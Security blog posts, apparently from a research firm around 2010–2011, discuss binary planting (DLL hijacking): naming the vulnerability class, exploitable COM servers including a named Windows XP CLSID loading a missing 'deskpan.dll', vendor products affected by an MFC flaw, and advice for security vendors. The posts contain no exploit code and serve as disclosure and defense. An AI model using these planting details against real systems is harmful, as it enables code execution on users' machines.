  • DLL hijacking implies that either a DLL gets hijacked or something gets hijacked using a DLL. But in large majority of binary planting vulnerabilities the binary (for instance, a DLL) in question does not exist - that is, until the attacker plants it. You can't hijack something that doesn't exist. One could say that a vulnerable application gets hijacked through a malicious DLL but then every vulnerability could be called hijacking of some sort. Note, however, that before Windows XP SP2, the dynamic-link libraries search order had the current working directory in the 2nd place, which produced a lot of possibilities to actually hijack an existing DLL (e.g., one from the Windows system folder) by placing a malicious copy with the same name in the current working directory. Back then, hijacking would have sounded more suitable.   
  • DLL preloading implies that some presumably malicious DLL gets loaded in advance (of something). We find no such advance-loading process taking place in the context of this vulnerability.
  • Insecure (library) loading sounds accurate as long as it's only libraries one considers. When other executables (EXEs or COMs, for example) join the party, loading is not a very suitable term any more. While technically, these also get loaded before they're executed, it's more common - and more understandable - to say they get ran, startedexecuted or launched.
  • DLL load hijacking is a little better than DLL hijacking as it implies that it is the process of loading that gets hijacked (and used for malicious purposes). However, this term contains an unfortunate hard-to-pronounce triple-L, and is likely to quickly (d)evolve into DLL hijacking. And again - just like with insecure library loading -, loading is not a very suitable term for non-library executables (EXEs, COMs, etc.).   
  • DLL spoofing is actually a nice term, short and accurate, but has long been widely used for another similar but conceptually very different activity, namely manually replacing an existing DLL on one's own computer in order to change the behavior of an application or operating system. This activity has nothing to do with security, at least not in terms of one person (attacker) doing something bad to another person (user), since the user does it to himself, so to speak.   

We chose the verb planting because, in our opinion, it accurately describes what the attacker needs to do in order to carry out the attack: planting a malicious binary somewhere where a vulnerable application will pick it up and execute it.

So these are our reasons for preferring the term binary planting to other alternatives for describing the entire scope of the problem. As it currently seems, DLL hijacking (for describing an attack) and insecure library loading (for describing a vulnerability) are here to stay as well, at least for libraries. This will certainly continue to cause unneeded confusion but perhaps a vulnerability class that has been overlooked for such a long time deserves more than one name.


(* Strictly speaking, the term insecure library loading does not describe an attack, but a vulnerability.)

Friday, May 6, 2011

Silently Pwning Protected-Mode IE9 and Innocent Windows Applications

Binary Planting Through COM Servers

This blog post sets up the stage for our Hack in the box presentation in Amsterdam on May 19.

[Update: Find the continuation of this blog post here.]

Those familiar with Windows COM servers know that they come in two types, in-process and out-of-process. For this post, the former type is of interest: an in-process COM server is a dynamic link library (DLL) that a COM client instantiates when needed, usually by calling the CoCreateInstance function with the class identifier (CLSID) of the said COM server. What happens then is the COM server initialization code looks up the provided CLSID in local registry under key HKEY_CLASSES_ROOT\CLSID, and finds the path to the DLL under the InProcServer32 subkey. It then expands eventual environment strings in the obtained DLL path and calls LoadLibrary with the resulting path. Whatever happens afterwards is of no interest to us here.

From the binary planting perspective the above process would be vulnerable if both of the following conditions were met:


  1. the path to the COM server DLL is a relative path instead of an absolute one; and
  2. the DLL doesn't exist in the LoadLibrary search path prior to the current working directory (i.e., in COM client's home directory or any one of the Windows system folders).  


Condition #1 is at the discretion of whoever registers the COM server. While most COM servers are registered with full absolute paths to their DLLs, some merely specify the name of the DLL without the path. This may not be due to a developer's oversight or laziness: the so-called side-by-side COM components (see here and here) require the DLL to be specified with a relative path.

Condition #2 is a bit more tricky as it seems unlikely, at the first glance, that someone - or some application - would register a COM server that doesn't exist on the system. But for reasons beyond our willingness to investigate, some software products do just that. Furthermore, some other software products fail to unregister their COM servers upon removal, leaving the user's computer with exploitable remnants of a removed COM server DLL. And finally, in the case of side-by-side COM components, these DLLs are successfully found and loaded when the COM server is invoked by the original application (the DLL is in the same folder as the COM client executable), but if another applications tries to invoke the same COM server, it won't find the DLL and will finally try to find it in the current working directory - to attacker's great satisfaction.

If you're now asking yourself whether such cases where both conditions are met actually exist: we did a quick search on our testing systems and found a few, one of them being preinstalled, so to speak, on every Windows XP machine, and others being introduced by various software products. Let's take a look at the "preinstalled" XP case.


The "preinstalled" XP binary planting vulnerability

On every Windows XP machine, there exists an in-process COM server named "Display Panning CPL Extension" with CLSID {42071714-76d4-11d1-8b24-00a0c9068ff3}. Truth be told, we don't know what its purpose is, and neither does the searchable Internet, but the DLL it specifies under the InProcServer32 subkey is "deskpan.dll". This is a relative path to a DLL that doesn't seem to exist on any XP system, and thus meets both of the above conditions.

Therefore, if any Windows process tries to create an instance of this COM server for whatever reason, and the current working directory of that process is set to an attacker-controlled location (possibly on a remote share), the attacker can plant a malicious deskpan.dll and have the said process load and execute it on user's computer.



Windows 7, Vista, and well-registered COM servers

Naturally, such attack also works on Windows 7 and Windows Vista as well as older Windows systems, as long as some registered COM server fulfills the above conditions. But it does, as usually, get even worse: we found that many well-registered COM servers on all Windows versions, having specified their DLL with an absolute path, load additional DLLs with a relative path, and many of these DLLs do not exist. This provides extensive binary planting potential to a great number of flawed LoadLibrary calls that could previously be considered non-exploitable. Yes, on all fully up-to-date Windows versions without any additional software installed.


The questions that now remain unanswered are:


  1. how to get some Windows process on user's computer to try to initialize a chosen vulnerable COM server; and
  2. how to get the current working directory of that process to point to the attacker's remote share?  


At the Hack in the box conference in Amsterdam on May 19, we will answer these questions by demonstrating two of our previously unpublished hacks:


Demo #1: Exploiting innocent Windows applications

First we will demonstrate how various applications on your Windows 7, Vista or XP can be forced to initialize any vulnerable COM server, and load a malicious DLL in the process. We'll show how Microsoft Word 2010 and PowerPoint 2010 execute a malicious DLL upon opening a document on Windows 7 (something that doesn't occur under normal circumstances), even in "protected view."  


Demo #2: Pwning protected-mode IE9 without warnings

And as if that weren't enough, we will show how this technique can be leveraged to launch a binary planting attack against Internet Explorers 8 on Windows XP as well as against Internet Explorer 9 in protected mode on Windows 7 - without any suspicious double-clicks or security warnings. (For the impatient: it's not through ActiveX controls.)


We look forward to seeing you in the audience and sharing our research with you. Of course we will also tell you how to avoid introducing described vulnerabilities in your own software creations and how to protect your web browsing experience from the perils of binary planting. In the mean time, we've updated our Binary Planting Guidelines For Developers accordingly.

(Credit for the above research goes mostly to Luka Treiber, security researcher at ACROS Security.)

Wednesday, April 13, 2011

Microsoft Patches Binary Planting Issues In Various Vendors' Products

That is, after making them vulnerable in the first place

Last October our company reported that Microsoft Visual Studio 2010 and 2008 (we didn't test 2005) injected an easily exploitable binary planting vulnerability into every MFC (Microsoft Foundation Class) application built with these development environments - and also into any other application using the Visual C++ redistributable libraries. The number of affected applications was, and still is, potentially pretty high: out of just over 200 applications we tested in our binary planting research project, thirteen (~ 6%) were found to be suffering from this flaw (some of them also had, or still have, other binary planting issues).

These are the "dirty thirteen" we found, although keep in mind that the "dirty" part is not their developers' fault. Also note that while some of these products may have had subsequent updates and versions, these are likely to be vulnerable as well unless they were substantially re-coded as non-MFC applications.


  1. Autodesk 3ds Max 2010 Release 12.0
  2. Autodesk 3ds Max 2011 Release 13.0
  3. Avast! Free Antivirus 5.0.545
  4. Avira Premium Security Suite 10.0.0.542
  5. BitDefender Total Security 2010 - Build 13.0.17.343
  6. CorelDraw X5 15.1.0.588
  7. Corel Paint Shop Pro Photo X3 13.2.0.41
  8. CyberLink PowerDirector 8.00.2220
  9. EMC QuickScan Pro Demo 4.7.0 (build 8554)
  10. EMC ApplicationXtender Document Manager v6.50.124.0
  11. Microsoft Office Professional 2010 14.0.4760.1000 (32-bit)
  12. Nuance PDF Converter Professional 6.0
  13. PC Security Shield Security Shield 2010 13.0.16.313

This week Microsoft finally fixed this bug in Visual C++ redistributable packages (apparently, version 2005 was vulnerable too). Now, does this fix magically make things right for end-users? Not entirely. If you're using a vulnerable product that dynamically loads the Visual C++ redistributable package, installing the correct security update(s) will resolve the problem and remove the vulnerability. All of the above listed applications will, for example, be fixed. However, MFC applications that statically link the MFC libraries effectively integrate these in their executables and do not use the (now fixed) redistributable libraries. Such applications will have to be re-built in (updated) Visual Studio and redistributed to end-users.

Recommendations

  • Users should apply the security updates for Visual C++ redistributable packages
  • Visual Studio Developers should apply the applicable security updates and re-build MFC applications that statically link MFC libraries (and obviously, distribute the new build to end users).

Tuesday, January 11, 2011

How To Secure a Security Product

And Whose Bug Is It, Anyway?

Our company issued a security advisory today about a binary planting vulnerability in multiple F-Secure products, including F-Secure Internet Security 2011. F-Secure has issued automatically deployed fixes for this vulnerability last month, and all affected users can at this moment safely be presumed safe, so to speak. Before going any further, it has to be said that F-Secure Corporation was extremely responsive and cooperative during the whole process of resolving this issue, and demonstrated a high level of commitment to the security of their users.

Now, two facts are of interest in this case. First, the remotely exploitable code-execution bug is in a security product. Security products are especially designed to protect computer systems so when one such product makes it possible to attack a system that might otherwise not be vulnerable, it means a serious compromise of  that product's main purpose - namely to protect the system. Think about it: if there's a code-execution vulnerability in a web browser or in a document editing software, these products may still perform their mission and allow you to browse the Internet pages or write documents, even though they also allow attackers to own your computer. In other words, their main "purpose in life" has not been compromised, and their value to the user may remain unaffected. But when a security product is vulnerable, it begins to provide the exact opposite of what it was purchased for - insecurity instead of security.

Second, the remotely exploitable code-execution bug was not "developed" by the vendor's developers: it resided in Nokia's Qt, a cross-platform and application UI framework, which F-Secure developers trusted and integrated in their products. Such trust is often extended, and can be highly economical - the whole idea behind  3rd party programming libraries is in the division of labor, the concept that allowed the mankind to prosper so enormously. Why develop some special and complex functionality yourself if you can license it from someone with expertise who has already developed it, and quite possibly better than you would have? It saves time and money, and makes your product more competitive. There's just this small pesky issue of security. What if such 3rd-party code includes vulnerabilities that will "infect" your product when you integrate it? How can you even know? And who will be to blame for these bugs in your product?

Mind you, we've been discovering vulnerabilities in security products for more than a decade now and helped their vendors fix them before these bugs could put their users at risk. Vendors of security products are well aware that any vulnerabilities in their products have a potential to directly affect their revenue, and not in a good way (a sentiment not shared by many non-security product vendors). If you sell security products, it helps if your prospects believe that you're actually going to increase, not decrease their security. However, this is a difficult goal to achieve: security software is like any other software, increasingly complex, full of 3rd-party (often closed) code, developed rapidly to meet deadlines set by marketing, and built upon a limited budget. All these factors are vulnerability-friendly.

So what should security product vendors do to keep vulnerabilities out of their products?


  1. They need to obtain more assurance of the security of all 3rd-party code they integrate in their products. This can be done by having the source code reviewed by skilled experts (if the source code is available), or having the built product reviewed in a black box manner;
  2. They need to have their own code reviewed by either internal or external vulnerability hunters before the products are deployed to users. Developers are people, people make mistakes, mistakes often evolve into functional or security problems, functional problems can be caught by QA but security problems generally can't;
  3. They need to keep an eye on newly discovered vulnerability types that may affect their products. Binary planting is one such case, others include SSL certificate null-terminate attacks, remote file inclusion, session fixation and many more;
  4. They need to keep an eye on discovered vulnerabilities in the 3rd-party code they integrate. When such vulnerabilities are publicly known, attackers will quickly find vulnerable products and will try to exploit them.

How does this arguably incomplete list differ from what other (non-security) software vendors should do? From a pure security perspective, it really doesn't, as any product running on a computer - regardless of its declared function - can provide an entry point for attackers, although products running with higher privileges (which security products often are) are more risky. But from the business perspective, security software vendors will be smart to go an extra mile. Security is their sole functionality and their only purpose. It's hard to convince a customer that you will secure their system if you can't seem to be able, or willing, to secure your own product.

Security software vendors are, by the nature of their products, not only expected to provide premium security software, but also premium software security. In the world where many software vendors as well as users seem to have conceded that security is a reactive game where attackers always win, security vendors may be our best hope for driving the progress in code security and vulnerability prevention, and for showing that secure software is not, in fact, a myth.